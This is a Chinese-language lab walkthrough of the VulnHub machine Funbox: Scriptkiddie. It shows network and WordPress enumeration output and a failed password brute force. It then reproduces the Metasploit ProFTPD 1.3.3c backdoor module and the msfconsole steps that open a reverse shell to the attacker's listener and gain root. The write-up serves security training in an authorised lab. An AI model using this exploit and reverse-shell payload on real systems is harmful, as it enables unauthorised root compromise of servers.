vulhub系列-58-Funbox: Scriptkiddie(超详细)

免责声明本文记录的是 Funbox: Scriptkiddie 渗透测试靶机 的解题过程所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规自觉维护网络空间安全。环境 https://download.vulnhub.com/funbox/Funbox11.ova一、信息收集1、探测目标IP地址arp-scan -l #探测当前网段的所有ip地址┌──(root㉿kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.11 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered) 192.168.5.2 08:00:27:e0:71:d3 PCS Systemtechnik GmbH 192.168.5.14 08:00:27:99:7a:37 PCS Systemtechnik GmbH ​ 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.953 seconds (131.08 hosts/sec). 3 responded ​nmap -sP 192.168.5.0/24┌──(root㉿kali)-[~] └─# nmap -sP 192.168.5.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-11 08:29 -0400 Nmap scan report for 192.168.5.1 Host is up (0.00023s latency). MAC Address: 0A:00:27:00:00:04 (Unknown) Nmap scan report for 192.168.5.2 Host is up (0.00019s latency). MAC Address: 08:00:27:E0:71:D3 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.14 Host is up (0.00039s latency). MAC Address: 08:00:27:99:7A:37 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.11 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 3.01 seconds目标IP192.168.5.142、探测目标IP开放端口nmap -sV -p- 192.168.5.14┌──(root㉿kali)-[~] └─# nmap -sV -p- 192.168.5.14 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-11 08:29 -0400 Nmap scan report for 192.168.5.14 Host is up (0.000078s latency). Not shown: 65527 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.3c 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) 25/tcp open smtp Postfix smtpd 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 110/tcp open pop3 Dovecot pop3d 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) MAC Address: 08:00:27:99:7A:37 (Oracle VirtualBox virtual NIC) Service Info: Hosts: funbox11, FUNBOX11; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel ​端口21、22、25、80、110、139、143、4453、目录探测dirsearch -u http://192.168.5.14┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.5.14 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 Wordlist size: 11460 Output File: /root/reports/http_192.168.5.14/_26-03-11_08-31-29.txt Target: http://192.168.5.14/ [08:31:29] Starting: [08:31:31] 403 - 277B - /.ht_wsr.txt [08:31:31] 403 - 277B - /.htaccess.bak1 [08:31:31] 403 - 277B - /.htaccess.orig [08:31:31] 403 - 277B - /.htaccess.sample [08:31:31] 403 - 277B - /.htaccess.save [08:31:31] 403 - 277B - /.htaccess_extra [08:31:31] 403 - 277B - /.htaccess_orig [08:31:31] 403 - 277B - /.htaccessBAK [08:31:31] 403 - 277B - /.htaccess_sc [08:31:31] 403 - 277B - /.htaccessOLD [08:31:31] 403 - 277B - /.htaccessOLD2 [08:31:31] 403 - 277B - /.html [08:31:31] 403 - 277B - /.htm [08:31:31] 403 - 277B - /.htpasswd_test [08:31:31] 403 - 277B - /.httr-oauth [08:31:31] 403 - 277B - /.htpasswds [08:31:31] 403 - 277B - /.php [08:31:31] 403 - 277B - /.php3 [08:31:48] 301 - 0B - /index.php - http://192.168.5.14/ [08:31:49] 404 - 8KB - /index.php/login/ [08:31:50] 200 - 7KB - /license.txt [08:31:58] 200 - 3KB - /readme.html [08:31:59] 403 - 277B - /server-status [08:31:59] 403 - 277B - /server-status/ [08:32:07] 301 - 315B - /wp-admin - http://192.168.5.14/wp-admin/ [08:32:07] 200 - 0B - /wp-config.php [08:32:07] 302 - 0B - /wp-admin/ - http://funbox11/wp-login.php?redirect_tohttp%3A%2F%2F192.168.5.14%2Fwp-admin%2Freauth1 [08:32:07] 400 - 1B - /wp-admin/admin-ajax.php [08:32:07] 200 - 507B - /wp-admin/install.php [08:32:07] 409 - 3KB - /wp-admin/setup-config.php [08:32:07] 301 - 317B - /wp-content - http://192.168.5.14/wp-content/ [08:32:07] 200 - 0B - /wp-content/ [08:32:07] 200 - 84B - /wp-content/plugins/akismet/akismet.php [08:32:07] 500 - 0B - /wp-content/plugins/hello.php [08:32:07] 200 - 478B - /wp-content/uploads/ [08:32:07] 200 - 416B - /wp-content/upgrade/ [08:32:07] 301 - 318B - /wp-includes - http://192.168.5.14/wp-includes/ [08:32:07] 200 - 0B - /wp-includes/rss-functions.php [08:32:07] 200 - 4KB - /wp-includes/ [08:32:07] 200 - 0B - /wp-cron.php [08:32:07] 200 - 2KB - /wp-login.php [08:32:07] 302 - 0B - /wp-signup.php - http://funbox11/wp-login.php?actionregister [08:32:08] 405 - 42B - /xmlrpc.php Task Completeddirb http://192.168.5.14┌──(root㉿kali)-[~] └─# dirb http://192.168.5.14 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Wed Mar 11 08:33:12 2026 URL_BASE: http://192.168.5.14/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.5.14/ ---- http://192.168.5.14/index.php (CODE:301|SIZE:0) http://192.168.5.14/server-status (CODE:403|SIZE:277) DIRECTORY: http://192.168.5.14/wp-admin/ DIRECTORY: http://192.168.5.14/wp-content/ DIRECTORY: http://192.168.5.14/wp-includes/ http://192.168.5.14/xmlrpc.php (CODE:405|SIZE:42) ---- Entering directory: http://192.168.5.14/wp-admin/ ---- http://192.168.5.14/wp-admin/admin.php (CODE:302|SIZE:0) DIRECTORY: http://192.168.5.14/wp-admin/css/ DIRECTORY: http://192.168.5.14/wp-admin/images/ DIRECTORY: http://192.168.5.14/wp-admin/includes/ http://192.168.5.14/wp-admin/index.php (CODE:302|SIZE:0) DIRECTORY: http://192.168.5.14/wp-admin/js/ DIRECTORY: http://192.168.5.14/wp-admin/maint/ DIRECTORY: http://192.168.5.14/wp-admin/network/ DIRECTORY: http://192.168.5.14/wp-admin/user/ ---- Entering directory: http://192.168.5.14/wp-content/ ---- http://192.168.5.14/wp-content/index.php (CODE:200|SIZE:0) DIRECTORY: http://192.168.5.14/wp-content/languages/ DIRECTORY: http://192.168.5.14/wp-content/plugins/ DIRECTORY: http://192.168.5.14/wp-content/themes/ DIRECTORY: http://192.168.5.14/wp-content/upgrade/ DIRECTORY: http://192.168.5.14/wp-content/uploads/ ---- Entering directory: http://192.168.5.14/wp-includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://192.168.5.14/wp-admin/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://192.168.5.14/wp-admin/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://192.168.5.14/wp-admin/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://192.168.5.14/wp-admin/js/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://192.168.5.14/wp-admin/maint/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://192.168.5.14/wp-admin/network/ ---- http://192.168.5.14/wp-admin/network/admin.php (CODE:302|SIZE:0) http://192.168.5.14/wp-admin/network/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.5.14/wp-admin/user/ ---- http://192.168.5.14/wp-admin/user/admin.php (CODE:302|SIZE:0) http://192.168.5.14/wp-admin/user/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.5.14/wp-content/languages/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://192.168.5.14/wp-content/plugins/ ---- http://192.168.5.14/wp-content/plugins/index.php (CODE:200|SIZE:0) ---- Entering directory: http://192.168.5.14/wp-content/themes/ ---- http://192.168.5.14/wp-content/themes/index.php (CODE:200|SIZE:0) ---- Entering directory: http://192.168.5.14/wp-content/upgrade/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ---- Entering directory: http://192.168.5.14/wp-content/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway) ----------------- END_TIME: Wed Mar 11 08:33:20 2026 DOWNLOADED: 32284 - FOUND: 12gobuster dir -u http://192.168.5.14 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php┌──(root㉿kali)-[~] └─# gobuster dir -u http://192.168.5.14 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php Gobuster v3.8 by OJ Reeves (TheColonial) Christian Mehlmauer (firefart) [] Url: http://192.168.5.14 [] Method: GET [] Threads: 10 [] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [] Negative Status codes: 404 [] User Agent: gobuster/3.8 [] Extensions: php [] Timeout: 10s Starting gobuster in directory enumeration mode /wp-content (Status: 301) [Size: 317] [-- http://192.168.5.14/wp-content/] /index.php (Status: 301) [Size: 0] [-- http://192.168.5.14/] /wp-includes (Status: 301) [Size: 318] [-- http://192.168.5.14/wp-includes/] /wp-login.php (Status: 200) [Size: 7339] /wp-trackback.php (Status: 200) [Size: 135] /wp-admin (Status: 301) [Size: 315] [-- http://192.168.5.14/wp-admin/] /xmlrpc.php (Status: 405) [Size: 42] /wp-signup.php (Status: 302) [Size: 0] [-- http://funbox11/wp-login.php?actionregister] /server-status (Status: 403) [Size: 277] Progress: 441116 / 441116 (100.00%) Finished 二、漏洞利用1、信息搜集192.168.5.14在主页点击MOUNT FUJI!靶机描述中提到我们添加域名解析Description As always, it’s a very easy box for beginners. Add to your /etc/hosts: funbox11 This works better with VirtualBox rather than VMware.192.168.5.14 funbox112、wpscan扫描wpscan --url http://funbox11/ --enumerate u┌──(root㉿kali)-[~] └─# wpscan --url http://funbox11/ --enumerate u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _ | _ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.28 Sponsored by Automattic - https://automattic.com/ _WPScan_, ethicalhack3r, erwan_lr, firefart _______________________________________________________________ [] URL: http://funbox11/ [192.168.5.14] [] Started: Wed Mar 11 08:49:05 2026 Interesting Finding(s): [] Headers | Interesting Entry: Server: Apache/2.4.18 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [] XML-RPC seems to be enabled: http://funbox11/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [] WordPress readme found: http://funbox11/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [] Upload directory has listing enabled: http://funbox11/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [] The external WP-Cron seems to be enabled: http://funbox11/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [] WordPress version 5.7.2 identified (Insecure, released on 2021-05-12). | Found By: Rss Generator (Passive Detection) | - http://funbox11/index.php/feed/, generatorhttps://wordpress.org/?v5.7.2/generator | - http://funbox11/index.php/comments/feed/, generatorhttps://wordpress.org/?v5.7.2/generator [] WordPress theme in use: block-lite | Location: http://funbox11/wp-content/themes/block-lite/ | Last Updated: 2022-05-30T00:00:00.000Z | Readme: http://funbox11/wp-content/themes/block-lite/README.txt | [!] The version is out of date, the latest version is 1.3 | Style URL: http://funbox11/wp-content/themes/block-lite/style.css?ver5.7.2 | Style Name: Block Lite | Style URI: https://organicthemes.com/theme/block-lite/ | Description: The Block Lite theme features a modern and responsive design with a block style layout for blog post... | Author: Organic Themes | Author URI: https://organicthemes.com | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.2.2 (80% confidence) | Found By: Style (Passive Detection) | - http://funbox11/wp-content/themes/block-lite/style.css?ver5.7.2, Match: Version: 1.2.2 [] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://funbox11/index.php/wp-json/wp/v2/users/?per_page100page1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [] Finished: Wed Mar 11 08:49:09 2026 [] Requests Done: 54 [] Cached Requests: 6 [] Data Sent: 12.984 KB [] Data Received: 192.543 KB [] Memory used: 189.039 MB [] Elapsed time: 00:00:03得出admin用户3、枚举密码wpscan --url http://funbox11/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin枚举失败4、ProFTPD 1.3.3c 后门命令执行漏洞searchsploit ProFTPD 1.3.3c searchsploit -m 16921.rb cat 16921.rb┌──(root㉿kali)-[~] └─# searchsploit ProFTPD 1.3.3c ------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------ --------------------------------- ProFTPd 1.3.3c - Compromised Source Backdoor Remote C | linux/remote/15662.txt ProFTPd-1.3.3c - Backdoor Command Execution (Metasplo | linux/remote/16921.rb ------------------------------------------------------ --------------------------------- Shellcodes: No Results ┌──(root㉿kali)-[~] └─# searchsploit -m 16921.rb Exploit: ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit) URL: https://www.exploit-db.com/exploits/16921 Path: /usr/share/exploitdb/exploits/linux/remote/16921.rb Codes: OSVDB-69562 Verified: True File Type: Ruby script, ASCII text Copied to: /root/16921.rb ┌──(root㉿kali)-[~] └─# cat 16921.rb ## # $Id: proftpd_133c_backdoor.rb 11214 2010-12-03 12:34:38Z swtornio $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require msf/core class Metasploit3 Msf::Exploit::Remote Rank ExcellentRanking include Msf::Exploit::Remote::Ftp def initialize(info {}) super(update_info(info, Name ProFTPD-1.3.3c Backdoor Command Execution, Description %q{ This module exploits a malicious backdoor that was added to the ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz] archive between November 28th 2010 and 2nd December 2010. }, Author [ MC, darkharper2 ], License MSF_LICENSE, Version $Revision: 11214 $, References [ [ OSVDB, 69562], [ BID, 45150 ], [ URL, http://sourceforge.net/mailarchive/message.php?msg_namealpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org ], ], Privileged true, Platform [ unix ], Arch ARCH_CMD, Payload { Space 2000, BadChars , DisableNops true, Compat { PayloadType cmd, RequiredCmd generic perl telnet, } }, Targets [ [ Automatic, { } ], ], DisclosureDate Dec 2 2010, DefaultTarget 0)) deregister_options(FTPUSER, FTPPASS) end def exploit connect print_status(Sending Backdoor Command) sock.put(HELP ACIDBITCHEZ\r\n) res sock.get_once(-1,10) if ( res and res ~ /502/ ) print_error(Not backdoored) else sock.put(nohup payload.encoded /dev/null 21\n) handler end disconnect end end5、Exp# 启动Metasploit框架的命令行界面 msfconsole # 选择使用针对ProFTPD 1.3.3c版本的后门漏洞利用模块 use exploit/unix/ftp/proftpd_133c_backdoor # 设置目标主机IP地址受害者 set rhost 192.168.5.14 # 设置攻击载荷为Unix命令反向Shell set payload payload/cmd/unix/reverse # 设置本地主机IP地址攻击者监听IP set lhost 192.168.5.11 # 执行攻击 exploit┌──(root㉿kali)-[~] └─# msfconsole Metasploit tip: Metasploit can be configured at startup, see msfconsole --help to learn more .:okOOOkdc cdkOOOko:. .xOOOOOOOOOOOOc cOOOOOOOOOOOOx. :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO: OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO. cOOOOOOO.MMM.OOc.MMMMMoOO.MMM,OOOOOOOc oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl ;OOOOMMM.OOOO.MMM:OOOO.MMM;OOOO; .dOOoWM.OOOOocccxOOOO.MXxOOd. ,kOlM.OOOOOOOOOOOOO.MdOk, :kk;.OOOOOOOOOOOOO.;Ok: ;kOOOOOOOOOOOOOOOk: ,xOOOOOOOOOOOx, .lOOOOOOOl. ,dOd, . [ metasploit v6.4.103-dev ] -- --[ 2,584 exploits - 1,319 auxiliary - 1,694 payloads ] -- --[ 433 post - 49 encoders - 14 nops - 9 evasion ] Metasploit Documentation: https://docs.metasploit.com/ The Metasploit Framework is a Rapid7 Open Source Project msf use exploit/unix/ftp/proftpd_133c_backdoor msf exploit(unix/ftp/proftpd_133c_backdoor) set rhost 192.168.5.14 rhost 192.168.5.14 msf exploit(unix/ftp/proftpd_133c_backdoor) msf exploit(unix/ftp/proftpd_133c_backdoor) set payload payload/cmd/unix/reverse payload cmd/unix/reverse msf exploit(unix/ftp/proftpd_133c_backdoor) msf exploit(unix/ftp/proftpd_133c_backdoor) set lhost 192.168.5.11 lhost 192.168.5.11 msf exploit(unix/ftp/proftpd_133c_backdoor) msf exploit(unix/ftp/proftpd_133c_backdoor) exploit [*] Started reverse TCP double handler on 192.168.5.11:4444 [*] 192.168.5.14:21 - Sending Backdoor Command [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo DlOaSFpWZByPVTk9; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: DlOaSFpWZByPVTk9\r\n [*] Matching... [*] B is input... [*] Command shell session 1 opened (192.168.5.11:4444 - 192.168.5.14:44482) at 2026-03-11 08:56:35 -0400 id uid0(root) gid0(root) groups0(root),65534(nogroup) whoami root cd /root ls root.txt cat root.txt $$$$$$$$\ $$\ $$ _____| $$ | $$ | $$\ $$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$\ $$\ $$\ $$$$$\ $$ | $$ |$$ __$$\ $$ __$$\ $$ __$$\ \$$\ $$ |\__| $$ __|$$ | $$ |$$ | $$ |$$ | $$ |$$ / $$ | \$$$$ / $$ | $$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ $$ $$\ $$ | \$$$$$$ |$$ | $$ |$$$$$$$ |\$$$$$$ |$$ /\$$\ \__| \__| \______/ \__| \__|\_______/ \______/ \__/ \__| $$$$$$\ $$\ $$\ $$\ $$\ $$\ $$\ $$\ $$ __$$\ \__| $$ | $$ | \__| $$ | $$ |\__| $$ / \__| $$$$$$$\ $$$$$$\ $$\ $$$$$$\ $$$$$$\ $$ | $$\ $$\ $$$$$$$ | $$$$$$$ |$$\ $$$$$$\ \$$$$$$\ $$ _____|$$ __$$\ $$ |$$ __$$\\_$$ _| $$ | $$ |$$ |$$ __$$ |$$ __$$ |$$ |$$ __$$\ \____$$\ $$ / $$ | \__|$$ |$$ / $$ | $$ | $$$$$$ / $$ |$$ / $$ |$$ / $$ |$$ |$$$$$$$$ | $$\ $$ |$$ | $$ | $$ |$$ | $$ | $$ |$$\ $$ _$$ $$ |$$ | $$ |$$ | $$ |$$ |$$ ____| \$$$$$$ |\$$$$$$$\ $$ | $$ |$$$$$$$ | \$$$$ |$$ | \$$\ $$ |\$$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\ \______/ \_______|\__| \__|$$ ____/ \____/ \__| \__|\__| \_______| \_______|\__| \_______| $$ | $$ | \__| Please, tweet this to: 0815R2d2 Thank you...成功提权后在root目录下root.txt拿到flagid whoami cd /root ls cat root.txtmsf exploit(unix/ftp/proftpd_133c_backdoor) exploit [*] Started reverse TCP double handler on 192.168.5.11:4444 [*] 192.168.5.14:21 - Sending Backdoor Command [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo DlOaSFpWZByPVTk9; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: DlOaSFpWZByPVTk9\r\n [*] Matching... [*] B is input... [*] Command shell session 1 opened (192.168.5.11:4444 - 192.168.5.14:44482) at 2026-03-11 08:56:35 -0400 ​ id uid0(root) gid0(root) groups0(root),65534(nogroup) ​ whoami root ​ cd /root ​ ls root.txt ​ cat root.txt $$$$$$$$\ $$\ $$ _____| $$ | $$ | $$\ $$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$\ $$\ $$\ $$$$$\ $$ | $$ |$$ __$$\ $$ __$$\ $$ __$$\ \$$\ $$ |\__| $$ __|$$ | $$ |$$ | $$ |$$ | $$ |$$ / $$ | \$$$$ / $$ | $$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ $$ $$\ $$ | \$$$$$$ |$$ | $$ |$$$$$$$ |\$$$$$$ |$$ /\$$\ \__| \__| \______/ \__| \__|\_______/ \______/ \__/ \__| $$$$$$\ $$\ $$\ $$\ $$\ $$\ $$\ $$\ $$ __$$\ \__| $$ | $$ | \__| $$ | $$ |\__| $$ / \__| $$$$$$$\ $$$$$$\ $$\ $$$$$$\ $$$$$$\ $$ | $$\ $$\ $$$$$$$ | $$$$$$$ |$$\ $$$$$$\ \$$$$$$\ $$ _____|$$ __$$\ $$ |$$ __$$\\_$$ _| $$ | $$ |$$ |$$ __$$ |$$ __$$ |$$ |$$ __$$\ \____$$\ $$ / $$ | \__|$$ |$$ / $$ | $$ | $$$$$$ / $$ |$$ / $$ |$$ / $$ |$$ |$$$$$$$$ | $$\ $$ |$$ | $$ | $$ |$$ | $$ | $$ |$$\ $$ _$$ $$ |$$ | $$ |$$ | $$ |$$ |$$ ____| \$$$$$$ |\$$$$$$$\ $$ | $$ |$$$$$$$ | \$$$$ |$$ | \$$\ $$ |\$$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\ \______/ \_______|\__| \__|$$ ____/ \____/ \__| \__|\__| \_______| \_______|\__| \_______| $$ | $$ | \__| ​ Please, tweet this to: 0815R2d2 Thank you...本文涉及的技术方法仅适用于 授权测试环境 或 合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路始于合规终于责任。